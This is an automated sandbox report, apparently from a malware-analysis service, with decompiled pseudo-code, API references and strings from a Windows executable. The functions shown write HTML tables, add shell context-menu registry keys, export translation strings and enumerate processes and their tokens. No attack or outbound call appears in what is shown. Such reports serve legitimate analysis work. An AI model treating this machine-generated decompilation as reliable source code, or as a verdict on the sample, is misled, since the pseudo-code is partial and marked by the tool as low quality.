						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}

0x00407763
0x0040776c
0x00407784
0x0040778b
0x00407797
0x00407799
0x0040779b
0x004077a7
0x004077ae
0x004077bd
0x004077c4
0x004077d3
0x004077da
0x004077e1
0x004077e6
0x004077f2
0x004077f5
0x00407804
0x00407805
0x00407810
0x00407812
0x00407813
0x00407818
0x00407818
0x00407825
0x0040782d
0x00407830
0x0040783a
0x00407840
0x00407846
0x00407849
0x00407850
0x0040785e
0x00407864
0x00407867
0x0040786b
0x0040786f
0x00407877
0x0040787a
0x00407885
0x00407892
0x004078a8
0x004078b8
0x004078c5
0x004078ff
0x004078c7
0x004078ca
0x004078dd
0x004078de
0x004078e3
0x004078e8
0x004078eb
0x004078f0
0x004078f0
0x00407906
0x00407909
0x0040790f
0x0040791d
0x00407923
0x0040792d
0x00407932
0x0040793b
0x00407942
0x00407943
0x0040794c
0x00407953
0x00407954
0x00407959
0x0040795c
0x00407961
0x0040796c
0x00407971
0x0040797a
0x00000000
0x00000000
0x00407838
0x00407838
0x0040783a
0x00407980
0x0040798a
0x004079a1

APIs

memset.MSVCRT ref: 00407784
memset.MSVCRT ref: 004077AE
memset.MSVCRT ref: 004077C4
memset.MSVCRT ref: 004077DA
_snwprintf.MSVCRT ref: 00407813
wcscpy.MSVCRT ref: 0040785E
_snwprintf.MSVCRT ref: 004078EB
wcscat.MSVCRT ref: 0040791D

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

wcscpy.MSVCRT ref: 004078FF
_snwprintf.MSVCRT ref: 0040795C

Strings

<table border="1" cellpadding="5">, xrefs: 0040781B
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040778C
bgcolor="%s", xrefs: 00407805
</table><p>, xrefs: 00407980
 , xrefs: 00407917
nowrap, xrefs: 00407858
<font color="%s">%s</font>, xrefs: 004078DE

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1607361635-601624466
Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}

0x00407b65
0x00407b7c
0x00407b83
0x00407b91
0x00407b98
0x00407ba6
0x00407bad
0x00407bb2
0x00407bb9
0x00407bca
0x00407bcb
0x00407bd6
0x00407bdb
0x00407bdc
0x00407be1
0x00407be1
0x00407be8
0x00407bf9
0x00407bfa
0x00407c05
0x00407c0a
0x00407c0b
0x00407c1c
0x00407c21
0x00407c21
0x00407c2a
0x00407c2b
0x00407c36
0x00407c3b
0x00407c3c
0x00407c41
0x00407c51
0x00407c56
0x00407c5b
0x00407c65
0x00407c68
0x00407c6b
0x00407c74
0x00407c7b
0x00407c80
0x00407c82
0x00407c88
0x00407ca6
0x00407c8a
0x00407c8a
0x00407c8b
0x00407c96
0x00407c9b
0x00407c9c
0x00407ca1
0x00407ca1
0x00407cb3
0x00407cb4
0x00407cbd
0x00407cc4
0x00407cc5
0x00407cd0
0x00407cd5
0x00407cd6
0x00407cdb
0x00407ceb
0x00407cf0
0x00407cf3
0x00407cf3
0x00407cf3
0x00000000
0x00407cfc
0x00407d00

APIs

memset.MSVCRT ref: 00407B83
memset.MSVCRT ref: 00407B98
memset.MSVCRT ref: 00407BAD
_snwprintf.MSVCRT ref: 00407BDC
_snwprintf.MSVCRT ref: 00407C0B
wcscpy.MSVCRT ref: 00407C1C
_snwprintf.MSVCRT ref: 00407C3C
memset.MSVCRT ref: 00407C7B
_snwprintf.MSVCRT ref: 00407C9C
_snwprintf.MSVCRT ref: 00407CD6

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

Strings

<font color="%s">, xrefs: 00407BFA
bgcolor="%s", xrefs: 00407BCB
<th%s>%s%s%s, xrefs: 00407CC5
width="%s", xrefs: 00407C8B
<table border="1" cellpadding="5"><tr%s>, xrefs: 00407C2B
</font>, xrefs: 00407C16

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124
registryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}

0x00404415
0x0040441d
0x0040442c
0x00404435
0x004045b3
0x004045b7
0x004045b7
0x0040444b
0x00404452
0x00404457
0x00404460
0x00404461
0x00404462
0x0040446d
0x00404472
0x00404473
0x00404490
0x004044a5
0x004044b4
0x004044b6
0x004044b7
0x004044bd
0x004044cf
0x004044db
0x004044eb
0x004044f1
0x004044f6
0x004044f9
0x004044fe
0x00404506
0x00404507
0x00404508
0x00404510
0x00404521
0x00404532
0x00404539
0x00404547
0x0040454e
0x0040455b
0x0040455c
0x00404564
0x0040456f
0x00404570
0x00404571
0x0040457c
0x0040457d
0x00404588
0x00404589
0x0040458a
0x004045a0
0x004045a5
0x00404521
0x004044eb
0x004045ab
0x00000000

APIs

memset.MSVCRT ref: 00404452
_snwprintf.MSVCRT ref: 00404473

Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC

RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB

Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
memset.MSVCRT ref: 004044CF

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

GetDriveTypeW.KERNEL32(?), ref: 00404518
memset.MSVCRT ref: 00404539
memset.MSVCRT ref: 0040454E
_snwprintf.MSVCRT ref: 00404571
_snwprintf.MSVCRT ref: 0040458A

Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57

Strings

"%s",0, xrefs: 0040457D
%s\shell\%s, xrefs: 00404564
%s\shell\%s\command, xrefs: 00404462
C:\, xrefs: 004044F1
:, xrefs: 004044E3

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
API String ID: 486436031-734527199
Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}

0x00406466
0x0040647d
0x00406484
0x00406499
0x004064a0
0x004064af
0x004064b4
0x004064bb
0x004064cd
0x004064d2
0x004064d4
0x004064e4
0x004064ea
0x004064ea
0x004064f3
0x00406503
0x00406514
0x00406525
0x0040653b
0x0040654e
0x00406568
0x00406572
0x0040657a
0x00406582
0x0040658a
0x00406596

APIs

memset.MSVCRT ref: 00406484
memset.MSVCRT ref: 004064A0

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128

wcscpy.MSVCRT ref: 004064E4
wcscpy.MSVCRT ref: 004064F3
wcscpy.MSVCRT ref: 00406503
EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
wcscpy.MSVCRT ref: 0040657A

Strings

TranslatorURL, xrefs: 00406520
general, xrefs: 004064F8
RTL, xrefs: 00406549
SFM, xrefs: 00406502
strings, xrefs: 00406574
TranslatorName, xrefs: 0040650F
Version, xrefs: 00406536

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
API String ID: 3037099051-2314623505
Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED

Uniqueness

Uniqueness Score: -1.00%

Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}

0x00409ab0
0x00409ab7
0x00409ac8
0x00409acf
0x00409ad4
0x00409ae0
0x00409ae6
0x00409ae8
0x00409af0
0x00409c3a
0x00409c41
0x00409c67
0x00000000
0x00409c67
0x00409c49
0x00409c50
0x00409c51
0x00409c56
0x00409c57
0x00409c5a
0x00000000
0x00409c64
0x00409b00
0x00409b03
0x00409b06
0x00409b0b
0x00409b10
0x00409ba9
0x00409bac
0x00409bc1
0x00409bc7
0x00409bcc
0x00409bd8
0x00409bf0
0x00409bf2
0x00409c23
0x00409c26
0x00409c2f
0x00409c34
0x00409c34
0x00000000
0x00409c2f
0x00409bf7
0x00409bfb
0x00409c02
0x00409c06
0x00409c0d
0x00409c14
0x00409c17
0x00409c18
0x00409c1b
0x00409c1e
0x00000000
0x00409c1e
0x00409b1f
0x00409b25
0x00409b2a
0x00409b2d
0x00409b33
0x00409b3d
0x00000000
0x00000000
0x00409b4b
0x00409b53
0x00000000
0x00000000
0x00409b6a
0x00409b6c
0x00409b6e
0x00000000
0x00000000
0x00409b77
0x00409b7b
0x00409b82
0x00409b86
0x00409b8d
0x00409b8e
0x00409b94
0x00000000

APIs

memset.MSVCRT ref: 00409AB7
memset.MSVCRT ref: 00409ACF
OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
_snwprintf.MSVCRT ref: 00409C5A

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

memset.MSVCRT ref: 00409B25
GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
memset.MSVCRT ref: 00409BC7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

Strings

GetTokenInformation, xrefs: 00409B43
%s\%s, xrefs: 00409C51
Y@, xrefs: 00409BA9

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
String ID: %s\%s$GetTokenInformation$Y@
API String ID: 3504373036-27875219
Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}

0x00409179
0x00409209
0x00409209
0x00409185
0x0040918a
0x0040918f
0x00409208
0x00000000
0x00409191
0x0040919e
0x004091a2
0x004091a7
0x004091af
0x004091b3
0x004091b8
0x004091c0
0x004091c4
0x004091c9
0x004091d1
0x004091d5
0x004091da
0x004091e2
0x004091e6
0x004091eb
0x004091ed
0x004091ed
0x004091eb
0x004091da
0x004091c9
0x004091b8
0x004091ff
0x00409202
0x00409202
0x00000000
0x004091ff

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
FreeLibrary.KERNEL32(00000000), ref: 00409202

Strings

GetModuleFileNameExW, xrefs: 004091BA
EnumProcessModules, xrefs: 004091A9
GetModuleBaseNameW, xrefs: 00409198
psapi.dll, xrefs: 00409180
EnumProcesses, xrefs: 004091CB
GetModuleInformation, xrefs: 004091DC

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Freememsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1182944575-70141382
Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C

Uniqueness

Uniqueness Score: -1.00%

Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}

0x004090f5
0x00409171
0x00409171
0x004090fd
0x00409103
0x00409107
0x00409170
0x00000000
0x00409170
0x00409116
0x0040911a
0x0040911f
0x00409127
0x0040912b
0x00409130
0x00409138
0x0040913c
0x00409141
0x00409149
0x0040914d
0x00409152
0x0040915a
0x0040915e
0x00409163
0x00409165
0x00409165
0x00409163
0x00409152
0x00409141
0x00409130
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
